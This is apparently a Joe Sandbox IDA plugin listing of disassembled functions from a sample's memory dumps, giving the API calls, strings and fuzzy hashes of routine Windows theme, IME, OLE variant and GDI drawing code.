Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: b1d6ec197b977121f08516ee7595b6c71277cc4a711715de584c8d8cf224beea
Instruction ID: 7b7d8db678f3df5f8ac19cc6ea9cc40e8ba0db552bbde7c3d36716ec44986af6
Opcode Fuzzy Hash: b1d6ec197b977121f08516ee7595b6c71277cc4a711715de584c8d8cf224beea
Instruction Fuzzy Hash: A4D05E6230E2A02AA210919A6D84D7B5ADCCAC97A9F01843AF588C6201D3008C06AA71

Uniqueness

Uniqueness Score: -1.00%

Function 029EA2E8 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeResource.KERNEL32(?), ref: 029EA2F7

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: FreeResource
String ID:
API String ID: 54164923-0
Opcode ID: d6618b3166dd2d9bf8e4447dcb263f2675a5a5db593ad47a37b370b1ea9764f3
Instruction ID: a93a9440b16f38ca4fc3188bdf8cc9e70a4d198c1f2571737ab7d2de42026d26
Opcode Fuzzy Hash: d6618b3166dd2d9bf8e4447dcb263f2675a5a5db593ad47a37b370b1ea9764f3
Instruction Fuzzy Hash: 4FD0A752740960030521B67C298058E938BCE84262304CA60A580C7250E718CD466FDB

Uniqueness

Uniqueness Score: -1.00%

Function 029DA30C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 029DA310

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: 40780567ea648be6f000db617f10910e690f96be7393bdb0f4d36b03cf102dc8
Instruction ID: 6725d4d5c1ec2abb0eb8b4494f1bd2c3c379c8cd5801088df5638c8792cd205b
Opcode Fuzzy Hash: 40780567ea648be6f000db617f10910e690f96be7393bdb0f4d36b03cf102dc8
Instruction Fuzzy Hash: 99A01100808820028A803328AC0223830C8A882B20FC88B88A8F8802E0EA2E0220A0A3

Uniqueness

Uniqueness Score: -1.00%

Function 02A5BA28 Relevance: 1.4, Strings: 1, Instructions: 165COMMON

Download Yara Rule

Strings

F, xrefs: 02A5BAC4

Memory Dump Source

Source File: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: d6ffe21d2d941e64807bf3424b63dbe30d820b4283a3ce816c806b92c1b66454
Instruction ID: 4c91127af604b3c4e70e3cad80254788fe2a69295e2576ca0e57d7404b7c6ff7
Opcode Fuzzy Hash: d6ffe21d2d941e64807bf3424b63dbe30d820b4283a3ce816c806b92c1b66454
Instruction Fuzzy Hash: FD517571F006198BEB08CE5DC8D07AEB6F7ABC8315F558539EA09E7388DEB45E018754

Uniqueness

Uniqueness Score: -1.00%

Function 02A4A1DD Relevance: .5, Instructions: 505COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d3ea7b5a62d0263bd5a8c0f012e1c092652189da95e11612ec9804777a53492
Instruction ID: 642ebb9fa1c441a53be36679f84849419d627025ff99ca773698ac4568d25463
Opcode Fuzzy Hash: 1d3ea7b5a62d0263bd5a8c0f012e1c092652189da95e11612ec9804777a53492
Instruction Fuzzy Hash: 18F17471E80229ABDF049BA5CD45BEFBBBBEF84310F148055F941B7286DE749911CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02A3EFBB Relevance: .4, Instructions: 372COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e72b05c9f72d7b1b0b82fb8626393fb8d2f34d5ddac7137c58889079514876d8
Instruction ID: 765d04ffe1f81f42907b6735ab56eb0cc258f07a6d7f031e623809d02f07c3a9
Opcode Fuzzy Hash: e72b05c9f72d7b1b0b82fb8626393fb8d2f34d5ddac7137c58889079514876d8
Instruction Fuzzy Hash: 3CD13875E503469FDB16CFA89D807AEFBF6AF49300F1480B9F848D2641EB749A54CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02A48D18 Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b824255cf96ec847ae8711f241e2aba64d2e3cc19cd3ccc37cc53f61f00fa9a
Instruction ID: 2e942e48eec418361cd3847c90013d40beb37932c060bfc5b13b77db21438118
Opcode Fuzzy Hash: 5b824255cf96ec847ae8711f241e2aba64d2e3cc19cd3ccc37cc53f61f00fa9a
Instruction Fuzzy Hash: 2AA1B230A40615AFDB05DFA9CD80BBFB7A7DFC4320F148266A8159B299DF74D901CA64

Uniqueness

Uniqueness Score: -1.00%

Function 029D2160 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Uniqueness

Uniqueness Score: -1.00%

Function 029FB744 Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 266libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(uxtheme.dll,00000000,029FBAF7), ref: 029FB77A
GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 029FB792
GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 029FB7A4
GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 029FB7B6
GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 029FB7C8
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 029FB7DA
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 029FB7EC
GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 029FB7FE
GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 029FB810
GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 029FB822
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 029FB834
GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 029FB846
GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 029FB858
GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 029FB86A
GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 029FB87C
GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 029FB88E
GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 029FB8A0
GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 029FB8B2
GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 029FB8C4
GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 029FB8D6
GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 029FB8E8
GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 029FB8FA
GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 029FB90C
GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 029FB91E
GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 029FB930
GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 029FB942
GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 029FB954
GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 029FB966
GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 029FB978
GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 029FB98A
GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 029FB99C
GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 029FB9AE
GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 029FB9C0
GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 029FB9D2
GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 029FB9E4
GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 029FB9F6
GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 029FBA08
GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 029FBA1A
GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 029FBA2C
GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 029FBA3E
GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 029FBA50
GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 029FBA62
GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 029FBA74
GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 029FBA86
GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 029FBA98
GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 029FBAAA
GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 029FBABC
GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 029FBACE

Strings

GetThemeRect, xrefs: 029FB928
IsThemeDialogTextureEnabled, xrefs: 029FBA5A
GetThemeSysInt, xrefs: 029FBA00
GetThemeSysSize, xrefs: 029FB9CA
GetThemeSysBool, xrefs: 029FB9B8
GetThemeEnumValue, xrefs: 029FB8F2
GetThemeColor, xrefs: 029FB898
GetThemeBool, xrefs: 029FB8CE
GetThemeSysString, xrefs: 029FB9EE
IsThemePartDefined, xrefs: 029FB874
GetThemeSysColorBrush, xrefs: 029FB9A6
DrawThemeText, xrefs: 029FB7C0
GetThemePosition, xrefs: 029FB904
GetThemeTextMetrics, xrefs: 029FB81A
GetCurrentThemeName, xrefs: 029FBA90
OpenThemeData, xrefs: 029FB78A
GetThemeString, xrefs: 029FB8BC
GetThemeFont, xrefs: 029FB916
GetThemeMetric, xrefs: 029FB8AA
GetThemeFilename, xrefs: 029FB982
GetThemeBackgroundContentRect, xrefs: 029FB7D2, 029FB7E4
GetThemeSysColor, xrefs: 029FB994
DrawThemeBackground, xrefs: 029FB7AE
SetWindowTheme, xrefs: 029FB970
GetThemePartSize, xrefs: 029FB7F6
GetWindowTheme, xrefs: 029FBA36
GetThemeBackgroundRegion, xrefs: 029FB82C
EnableTheming, xrefs: 029FBAC6
GetThemeInt, xrefs: 029FB8E0
HitTestThemeBackground, xrefs: 029FB83E
GetThemeSysFont, xrefs: 029FB9DC
GetThemeTextExtent, xrefs: 029FB808
DrawThemeEdge, xrefs: 029FB850
uxtheme.dll, xrefs: 029FB775
GetThemeIntList, xrefs: 029FB94C
GetThemePropertyOrigin, xrefs: 029FB95E
CloseThemeData, xrefs: 029FB79C
DrawThemeParentBackground, xrefs: 029FBAB4
SetThemeAppProperties, xrefs: 029FBA7E
GetThemeDocumentationProperty, xrefs: 029FBAA2
IsThemeBackgroundPartiallyTransparent, xrefs: 029FB886
GetThemeMargins, xrefs: 029FB93A
IsAppThemed, xrefs: 029FBA24
EnableThemeDialogTexture, xrefs: 029FBA48
GetThemeAppProperties, xrefs: 029FBA6C
DrawThemeIcon, xrefs: 029FB862
IsThemeActive, xrefs: 029FBA12

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
API String ID: 2238633743-2910565190
Opcode ID: ae7cbc70f9ab9605166d0746880e22c7a8c83b7670d19247b8cda6131e79f02b
Instruction ID: 1d3c3feb6cfcbcc65b5bbd862c46c1845c3d102bb84816f30d065e30fb832741
Opcode Fuzzy Hash: ae7cbc70f9ab9605166d0746880e22c7a8c83b7670d19247b8cda6131e79f02b
Instruction Fuzzy Hash: 94A132B0A84390AFFF80EFB4E8D992637ACEB997043004969E515DF245DB78D811DF12

Uniqueness

Uniqueness Score: -1.00%

Function 02A17028 Relevance: 49.1, APIs: 15, Strings: 13, Instructions: 95libraryloaderCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008000), ref: 02A17041
GetModuleHandleA.KERNEL32(USER32,00000000,02A1718E,?,00008000), ref: 02A17065
GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 02A17072
LoadLibraryA.KERNEL32(imm32.dll,00000000,02A1718E,?,00008000), ref: 02A1708E
GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 02A170B0
GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 02A170C5
GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 02A170DA
GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 02A170EF
GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 02A17104
GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 02A17119
GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 02A1712E
GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 02A17143
GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 02A17158
GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 02A1716D
SetErrorMode.KERNEL32(?,02A17195,00008000), ref: 02A17188

Strings

ImmIsIME, xrefs: 02A1714D
ImmGetConversionStatus, xrefs: 02A170CF
ImmSetCompositionWindow, xrefs: 02A1710E
USER32, xrefs: 02A17060
WINNLSEnableIME, xrefs: 02A1706C
ImmSetCompositionFontA, xrefs: 02A17123
ImmReleaseContext, xrefs: 02A170BA
ImmNotifyIME, xrefs: 02A17162
ImmSetOpenStatus, xrefs: 02A170F9
ImmGetContext, xrefs: 02A170A5
ImmSetConversionStatus, xrefs: 02A170E4
imm32.dll, xrefs: 02A17089
ImmGetCompositionStringA, xrefs: 02A17138

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
String ID: ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
API String ID: 3397921170-3950384806
Opcode ID: dd5e36c553b68e19cd2ce27084cd6cb49fde172b3c84214d22645b1b0e8920c3
Instruction ID: 56780e41427d39d39d5766be31f7cfc53c4c9fd063c5ac4967742b91038eecaf
Opcode Fuzzy Hash: dd5e36c553b68e19cd2ce27084cd6cb49fde172b3c84214d22645b1b0e8920c3
Instruction Fuzzy Hash: 4231DBB1EC4340AEFB00EBB4AC9A969B7AAF784714B009C19F506D7111DF78D826DF20

Uniqueness

Uniqueness Score: -1.00%

Function 029DE600 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 029DE609

Part of subcall function 029DE5D4: GetProcAddress.KERNEL32(00000000), ref: 029DE5ED

Strings

VarAnd, xrefs: 029DE6DD
VarIdiv, xrefs: 029DE6B1
VarCyFromStr, xrefs: 029DE78D
VarNeg, xrefs: 029DE62D
oleaut32.dll, xrefs: 029DE604
VarI4FromStr, xrefs: 029DE735
VarMod, xrefs: 029DE6C7
VarDiv, xrefs: 029DE69B
VarAdd, xrefs: 029DE659
VarNot, xrefs: 029DE643
VarR8FromStr, xrefs: 029DE761
VarR4FromStr, xrefs: 029DE74B
VarDateFromStr, xrefs: 029DE777
VariantChangeTypeEx, xrefs: 029DE617
VarMul, xrefs: 029DE685
VarSub, xrefs: 029DE66F
VarBstrFromBool, xrefs: 029DE7E5
VarOr, xrefs: 029DE6F3
VarXor, xrefs: 029DE709
VarBstrFromCy, xrefs: 029DE7B9
VarBstrFromDate, xrefs: 029DE7CF
VarCmp, xrefs: 029DE71F
VarBoolFromStr, xrefs: 029DE7A3

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: 44a460ed3e3c6d62f43b120f22bec462de5a13dec10028c4536da4fe5a7cd12a
Instruction ID: 87ae4c8b92971330904144eebc08e712da1dbb958efde556fa9b1e7ef95c9855
Opcode Fuzzy Hash: 44a460ed3e3c6d62f43b120f22bec462de5a13dec10028c4536da4fe5a7cd12a
Instruction Fuzzy Hash: 6F411170EE83045B66086F79780442BB7DAD384750374C42AF4C4AFA51EE31ED42BB2A

Uniqueness

Uniqueness Score: -1.00%

Function 029F36B0 Relevance: 37.7, APIs: 25, Instructions: 245windowCOMMON

Download Yara Rule

APIs

CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 029F36F3
SelectObject.GDI32(?,?), ref: 029F3708
MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,CCAA0029,00000000,029F3778,?,?), ref: 029F374C
SelectObject.GDI32(?,?), ref: 029F3766
DeleteObject.GDI32(?), ref: 029F3772
CreateCompatibleDC.GDI32(00000000), ref: 029F3786
CreateCompatibleBitmap.GDI32(?,?,?), ref: 029F37A7
SelectObject.GDI32(?,?), ref: 029F37BC
SelectPalette.GDI32(?,04080DCD,00000000), ref: 029F37D0
SelectPalette.GDI32(?,?,00000000), ref: 029F37E2
SelectPalette.GDI32(?,00000000,000000FF), ref: 029F37F7
SelectPalette.GDI32(?,04080DCD,000000FF), ref: 029F380D
RealizePalette.GDI32(?), ref: 029F3819
StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 029F383B
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 029F385D
SetTextColor.GDI32(?,00000000), ref: 029F3865
SetBkColor.GDI32(?,00FFFFFF), ref: 029F3873
StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 029F389F
StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 029F38C4
SetTextColor.GDI32(?,?), ref: 029F38CE
SetBkColor.GDI32(?,?), ref: 029F38D8
SelectObject.GDI32(?,00000000), ref: 029F38EB
DeleteObject.GDI32(?), ref: 029F38F4
SelectPalette.GDI32(?,00000000,00000000), ref: 029F3916
DeleteDC.GDI32(?), ref: 029F391F

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize
String ID:
API String ID: 3976802218-0
Opcode ID: b512bcc4b605714e26be66b5c6317febf335f045ca9f19c0ba51a2fda4ec9fa9
Instruction ID: 621b23ed4f9cddc4a62cc70dd8052ad59a39354f728ed0fff5b7e110cf823c61
Opcode Fuzzy Hash: b512bcc4b605714e26be66b5c6317febf335f045ca9f19c0ba51a2fda4ec9fa9
Instruction Fuzzy Hash: 5F819DB2A00249AFDB90EFA9DC84EAF7BFDAB4C710F114554FA18E7240C635E9009B64

Uniqueness

Uniqueness Score: -1.00%

Function 029F5644 Relevance: 31.7, APIs: 21, Instructions: 194windowCOMMON

Download Yara Rule

APIs

GetObjectA.GDI32(?,00000054,?), ref: 029F5667
GetDC.USER32(00000000), ref: 029F5695
CreateCompatibleDC.GDI32(?), ref: 029F56A6
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 029F56C1
SelectObject.GDI32(?,00000000), ref: 029F56DB
PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 029F56FD
CreateCompatibleDC.GDI32(?), ref: 029F570B
SelectObject.GDI32(?), ref: 029F5753
SelectPalette.GDI32(?,?,00000000), ref: 029F5766
RealizePalette.GDI32(?), ref: 029F576F
SelectPalette.GDI32(?,?,00000000), ref: 029F577B
RealizePalette.GDI32(?), ref: 029F5784
SetBkColor.GDI32(?), ref: 029F578E
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 029F57B2
SetBkColor.GDI32(?,00000000), ref: 029F57BC
SelectObject.GDI32(?,00000000), ref: 029F57CF
DeleteObject.GDI32 ref: 029F57DB
DeleteDC.GDI32(?), ref: 029F57F1
SelectObject.GDI32(?,00000000), ref: 029F580C
DeleteDC.GDI32(00000000), ref: 029F5828
ReleaseDC.USER32(00000000,00000000), ref: 029F5839

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
String ID:
API String ID: 332224125-0
Opcode ID: b02542fce46ad56fddab4a882a562aaa8725022c560b0202646a9eb21c4dfe99
Instruction ID: de5165c6785daab2dea56c58aa16496aed04c46eaf95ccfdb9d685910e094cca
Opcode Fuzzy Hash: b02542fce46ad56fddab4a882a562aaa8725022c560b0202646a9eb21c4dfe99
Instruction Fuzzy Hash: 69511A71E00249ABDB90EBF9DC84FAEB7FDAF88700F518865B614E7280D7749940DB60

Uniqueness

Uniqueness Score: -1.00%

Function 029F63D4 Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 351windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 029F6642
CreateCompatibleDC.GDI32(00000001), ref: 029F66A7
CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 029F66BC
SelectObject.GDI32(?,00000000), ref: 029F66C6
SelectPalette.GDI32(?,?,00000000), ref: 029F66F6
RealizePalette.GDI32(?), ref: 029F6702
CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 029F6726
GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,029F677F,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 029F6734
SelectPalette.GDI32(?,00000000,000000FF), ref: 029F6766
SelectObject.GDI32(?,?), ref: 029F6773
DeleteObject.GDI32(00000000), ref: 029F6779

Strings

(, xrefs: 029F658D
BM, xrefs: 029F64F8

